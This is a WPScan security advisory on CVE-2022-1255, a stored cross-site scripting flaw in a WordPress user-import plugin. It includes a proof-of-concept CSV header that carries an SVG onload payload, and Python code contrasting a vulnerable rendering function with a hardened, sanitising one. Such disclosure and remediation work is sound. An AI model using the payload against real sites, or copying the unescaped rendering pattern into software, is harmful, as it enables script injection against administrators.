WPScan

WordPress Plugin Vulnerabilities

Import and export users and customers < 1.19.2.1 - Admin+ Stored Cross-Site Scripting

Description

The plugin does not sanitise or escape imported CSV data, which could allow high-privilege users to import malicious JavaScript code, leading to Stored Cross-Site Scripting issues.

Proof of Concept

As admin, import the below CSV file via Tools > Import and export users and customers (/wp-admin/tools.php?page=acui)

user_login	user_email	display_name	role<svg onload=confirm(/XSS/)//	first_name	last_name	billing_first_name	billing_last_name	billing_company	billing_email	billing_phone	billing_country	billing_address_1	billing_address_2	billing_city	billing_state	billing_postcode	shipping_first_name	shipping_last_name	shipping_company	shipping_country	shipping_address_1	shipping_address_2	shipping_city	shipping_state	shipping_postcode

The XSS is then triggered after the import, and again on the plugin's Extra profile fields page (/wp-admin/tools.php?page=acui&tab=columns).
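The payload in the PoC sits in a column name of the header row, which is stored as a meta key and rendered unescaped. The following added example (not the plugin's code) shows the vulnerable rendering pattern beside a hardened form that allowlists key names on import and HTML-escapes on output; the sample import data is constructed, and sanitize_key is a Python approximation of the WordPress function of the same name.

```python
import csv
import html
import io
import re

# Constructed sample: a shortened version of the advisory's tab-separated header
# row, followed by one constructed data row. The payload is a column *name*.
SAMPLE_TSV = (
    "user_login\tuser_email\trole<svg onload=confirm(/XSS/)//\tfirst_name\n"
    "alice\talice@example.test\tsubscriber\tAlice\n"
)

# Approximation of WordPress sanitize_key(): lowercase, keep only [a-z0-9_-].
_KEY_RE = re.compile(r"[^a-z0-9_-]")


def sanitize_key(name: str) -> str:
    """Allowlist-based input sanitisation for a meta key name."""
    return _KEY_RE.sub("", name.strip().lower())


def read_header(tsv_text: str) -> list[str]:
    """Parse the header row of a tab-separated import file."""
    reader = csv.reader(io.StringIO(tsv_text), delimiter="\t")
    return next(reader)


def vulnerable_render(columns: list[str]) -> str:
    """'Before' pattern: stored column names echoed straight into HTML."""
    return "".join(f"<li>{c}</li>" for c in columns)


def hardened_render(columns: list[str]) -> str:
    """'After' pattern: sanitise on import AND escape on output (defence in depth).
    Either layer alone neutralises the PoC; using both guards against a future
    code path that renders the raw stored key."""
    return "".join(
        f"<li>{html.escape(sanitize_key(c), quote=True)}</li>" for c in columns
    )


def flag_suspicious_columns(columns: list[str]) -> list[str]:
    """Detection helper: a name that changes under sanitisation contains markup
    or other disallowed characters and should be rejected or logged pre-import."""
    return [c for c in columns if sanitize_key(c) != c]
```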

Affects Plugins

import-users-from-csv-with-meta
Fixed in version 1.19.2.1

References

CVE
CVE-2022-1255

Classification

Type

XSS

OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79

Miscellaneous

Original Researcher

0x23.so

Submitter

0x23.so

Verified

Yes

WPVDB ID
22fe68c4-8f47-491e-be87-5e8e40535a82

Timeline

Publicly Published

2022-04-11

Added

2022-04-11

Last Updated

2022-04-13
